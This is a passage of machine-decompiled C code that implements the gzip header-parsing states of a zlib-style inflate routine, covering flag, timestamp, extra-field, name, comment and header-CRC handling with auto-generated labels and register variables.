                                                                                                                                                                                        													 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        													__eax = __ebp - 0x14;
                                                                                                                                                                                        													__eflags = __edx;
                                                                                                                                                                                        													 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        													__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__eax = 0;
                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                        												__edx = 0;
                                                                                                                                                                                        												 *__ebx = 2;
                                                                                                                                                                                        												 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        												__edi = 0;
                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L33:
                                                                                                                                                                                        											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t49 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t49;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L27:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L28:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __edx + __eax;
                                                                                                                                                                                        											_t52 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t52;
                                                                                                                                                                                        											__eax =  *_t52 + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        											__eflags = __edi - 0x10;
                                                                                                                                                                                        											if(__edi < 0x10) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L29;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 2:
                                                                                                                                                                                        									L39:
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L43:
                                                                                                                                                                                        										__eax = __ebx[8];
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 4) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        											__eax = __edx >> 8;
                                                                                                                                                                                        											 *(__ebp - 0x13) = __al;
                                                                                                                                                                                        											__edx = __edx >> 0x10;
                                                                                                                                                                                        											 *(__ebp - 0x12) = __al;
                                                                                                                                                                                        											__eax = __ebp - 0x14;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											 *(__ebp - 0x11) = __dl;
                                                                                                                                                                                        											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 4);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 3;
                                                                                                                                                                                        										 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										goto L48;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L40:
                                                                                                                                                                                        									_t72 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__eax =  *_t72;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L41:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L42:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t75 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t75;
                                                                                                                                                                                        										__eax =  *_t75 + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 3:
                                                                                                                                                                                        									L48:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L52:
                                                                                                                                                                                        										__ecx = __ebx[8];
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__eax = __dl & 0x000000ff;
                                                                                                                                                                                        											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                                                        											__ecx = __edx;
                                                                                                                                                                                        											__eax = __ebx[8];
                                                                                                                                                                                        											__ecx = __edx >> 8;
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											 *(__ebx[8] + 0xc) = __ecx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        											 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        											__eax = __ebp - 0x14;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 4;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        										 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        										goto L57;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L49:
                                                                                                                                                                                        									_t92 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__eax =  *_t92;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L50:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L51:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t95 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t95;
                                                                                                                                                                                        										__eax =  *_t95 + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L52;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 4:
                                                                                                                                                                                        									L57:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000400;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                                                                                                        										L67:
                                                                                                                                                                                        										__eax = __ebx[8];
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											_t136 = __eax + 0x10;
                                                                                                                                                                                        											 *_t136 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                                                        											__eflags =  *_t136;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L69:
                                                                                                                                                                                        										 *__ebx = 5;
                                                                                                                                                                                        										goto L70;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L58:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L62:
                                                                                                                                                                                        										__eax = __ebx[8];
                                                                                                                                                                                        										__ebx[0x10] = __edx;
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x14) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        											 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        											__eax = __ebp - 0x14;
                                                                                                                                                                                        											__eflags = __edx;
                                                                                                                                                                                        											 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        											__ebx[6] = E013230C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        										 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L59:
                                                                                                                                                                                        									_t116 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__eax =  *_t116;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L60:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L61:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t119 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t119;
                                                                                                                                                                                        										__eax =  *_t119 + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 5:
                                                                                                                                                                                        									L70:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000400;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000400) == 0) {
                                                                                                                                                                                        										L83:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L84:
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__ebx[0x10] = __edx;
                                                                                                                                                                                        										 *__ebx = 6;
                                                                                                                                                                                        										goto L86;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L71:
                                                                                                                                                                                        									__ecx = __ebx[0x10];
                                                                                                                                                                                        									__edx =  *(__ebp - 4);
                                                                                                                                                                                        									__eflags = __ecx - __edx;
                                                                                                                                                                                        									__ecx = __ecx > __edx ? __edx : __ecx;
                                                                                                                                                                                        									 *(__ebp - 0x30) = __ecx;
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx != 0) {
                                                                                                                                                                                        										__edx = __ebx[8];
                                                                                                                                                                                        										__eflags = __edx;
                                                                                                                                                                                        										if(__edx != 0) {
                                                                                                                                                                                        											__eax =  *(__edx + 0x10);
                                                                                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												__eax =  *(__edx + 0x14);
                                                                                                                                                                                        												__eax =  *(__edx + 0x14) - __ebx[0x10];
                                                                                                                                                                                        												__edx =  *(__edx + 0x18);
                                                                                                                                                                                        												 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        												__eflags = __eax - __edx;
                                                                                                                                                                                        												__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        												if(__eflags <= 0) {
                                                                                                                                                                                        													__edx = __ecx;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													__edx = __edx - __eax;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t152 = __ebp - 8; // 0x38
                                                                                                                                                                                        												__ecx =  *_t152;
                                                                                                                                                                                        												__eax = __eax +  *(__ebp - 0x2c);
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												__eax = memcpy(__eax,  *_t152, __edx);
                                                                                                                                                                                        												__ecx =  *(__ebp - 0x30);
                                                                                                                                                                                        												__esp = __esp + 0xc;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        										if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        											_t158 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__ebx[6] = E013230C1(__ebx[6],  *_t158, __ecx);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *(__ebp - 0x30);
                                                                                                                                                                                        										 *(__ebp - 4) =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        										_t166 =  &(__ebx[0x10]);
                                                                                                                                                                                        										 *_t166 = __ebx[0x10] - __eax;
                                                                                                                                                                                        										__eflags =  *_t166;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags = __ebx[0x10];
                                                                                                                                                                                        									if(__ebx[0x10] != 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										L82:
                                                                                                                                                                                        										goto L84;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 6:
                                                                                                                                                                                        									L85:
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L86:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000800;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000800) == 0) {
                                                                                                                                                                                        										L100:
                                                                                                                                                                                        										__eax = __ebx[8];
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x1c) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L102:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 7;
                                                                                                                                                                                        										__ebx[0x10] = 0;
                                                                                                                                                                                        										goto L104;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L87:
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx == 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L88:
                                                                                                                                                                                        									__esi =  *(__ebp - 4);
                                                                                                                                                                                        									__eax = __edx;
                                                                                                                                                                                        									_t175 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__edx =  *_t175;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L89:
                                                                                                                                                                                        										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        										__eax = __eax + 1;
                                                                                                                                                                                        										 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                                                        										__ecx = __ebx[8];
                                                                                                                                                                                        										 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__edx =  *(__ecx + 0x1c);
                                                                                                                                                                                        											__eflags =  *(__ecx + 0x1c);
                                                                                                                                                                                        											if( *(__ecx + 0x1c) != 0) {
                                                                                                                                                                                        												__edx = __ebx[0x10];
                                                                                                                                                                                        												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                                        												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                                                        													__ecx =  *(__ecx + 0x1c);
                                                                                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        													 *(__ecx + __edx) = __al;
                                                                                                                                                                                        													_t186 =  &(__ebx[0x10]);
                                                                                                                                                                                        													 *_t186 = __ebx[0x10] + 1;
                                                                                                                                                                                        													__eflags =  *_t186;
                                                                                                                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t189 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__edx =  *_t189;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        										if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L95:
                                                                                                                                                                                        										__eflags = __eax - __esi;
                                                                                                                                                                                        										if(__eax < __esi) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L96:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        									_t194 = __ebp + 8; // 0x38
                                                                                                                                                                                        									__esi =  *_t194;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        										__ebx[6] = __eax;
                                                                                                                                                                                        										__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx =  *(__ebp - 4);
                                                                                                                                                                                        									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        									__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        									 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        									if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										L99:
                                                                                                                                                                                        										goto L102;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 7:
                                                                                                                                                                                        									L103:
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L104:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00001000;
                                                                                                                                                                                        									if((__ebx[4] & 0x00001000) == 0) {
                                                                                                                                                                                        										L118:
                                                                                                                                                                                        										__eax = __ebx[8];
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x24) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L120:
                                                                                                                                                                                        										__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        										 *__ebx = 8;
                                                                                                                                                                                        										goto L121;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L105:
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx == 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L106:
                                                                                                                                                                                        									__esi =  *(__ebp - 4);
                                                                                                                                                                                        									__eax = __edx;
                                                                                                                                                                                        									_t210 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__edx =  *_t210;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L107:
                                                                                                                                                                                        										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        										__eax = __eax + 1;
                                                                                                                                                                                        										 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                                                        										__ecx = __ebx[8];
                                                                                                                                                                                        										 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__edx =  *(__ecx + 0x24);
                                                                                                                                                                                        											__eflags =  *(__ecx + 0x24);
                                                                                                                                                                                        											if( *(__ecx + 0x24) != 0) {
                                                                                                                                                                                        												__edx = __ebx[0x10];
                                                                                                                                                                                        												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                                                        												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                                                        													__ecx =  *(__ecx + 0x24);
                                                                                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                        													 *(__ecx + __edx) = __al;
                                                                                                                                                                                        													_t221 =  &(__ebx[0x10]);
                                                                                                                                                                                        													 *_t221 = __ebx[0x10] + 1;
                                                                                                                                                                                        													__eflags =  *_t221;
                                                                                                                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t224 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__edx =  *_t224;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        										if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L113:
                                                                                                                                                                                        										__eflags = __eax - __esi;
                                                                                                                                                                                        										if(__eax < __esi) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L114:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        									_t229 = __ebp + 8; // 0x38
                                                                                                                                                                                        									__esi =  *_t229;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000200) != 0) {
                                                                                                                                                                                        										__ebx[6] = __eax;
                                                                                                                                                                                        										__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx =  *(__ebp - 4);
                                                                                                                                                                                        									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        									__eflags =  *(__ebp - 0x2c);
                                                                                                                                                                                        									 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        									if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										L117:
                                                                                                                                                                                        										goto L120;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 8:
                                                                                                                                                                                        									L121:
                                                                                                                                                                                        									__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        									if((__ebx[4] & 0x00000200) == 0) {
                                                                                                                                                                                        										L129:
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L130:
                                                                                                                                                                                        										__ecx = __ebx[8];
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__ebx[4] = __ebx[4] >> 9;
                                                                                                                                                                                        											__eax = __ebx[4] >> 0x00000009 & 0x00000001;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											 *(__ecx + 0x2c) = __eax;
                                                                                                                                                                                        											__eax = __ebx[8];
                                                                                                                                                                                        											 *(__ebx[8] + 0x30) = 1;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = E013230C1(__edx, __edx, __edx);
                                                                                                                                                                                        										__ebx[6] = __eax;
                                                                                                                                                                                        										 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        										 *__ebx = 0xb;
                                                                                                                                                                                        										goto L133;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L122:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L126:
                                                                                                                                                                                        										__eax = __ebx[6] & 0x0000ffff;
                                                                                                                                                                                        										__eflags = __edx - (__ebx[6] & 0x0000ffff);
                                                                                                                                                                                        										if(__edx == (__ebx[6] & 0x0000ffff)) {
                                                                                                                                                                                        											L128:
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        											goto L130;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L127:
                                                                                                                                                                                        										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L123:
                                                                                                                                                                                        									_t244 = __ebp - 8; // 0x38
                                                                                                                                                                                        									__eax =  *_t244;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L124:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L125:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t247 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t247;
                                                                                                                                                                                        										__eax =  *_t247 + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L126;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 9:
                                                                                                                                                                                        									L139:
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L143:
                                                                                                                                                                                        										__ecx = __edx;
                                                                                                                                                                                        										__edi = 0xff00;
                                                                                                                                                                                        										__ecx = __edx & 0x0000ff00;
                                                                                                                                                                                        										__edx = __edx << 0x10;
                                                                                                                                                                                        										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                                                        										__edx = __edx >> 8;
                                                                                                                                                                                        										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                                                        										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                                                        										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                                                        										__edx = __edx >> 0x18;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__eax = __eax + __edx;
                                                                                                                                                                                        										__ebx[6] = __eax;
                                                                                                                                                                                        										 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 0xa;
                                                                                                                                                                                        										 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										goto L145;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L140:
                                                                                                                                                                                        									__eax =  *(__ebp - 8);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L141:
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L142:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
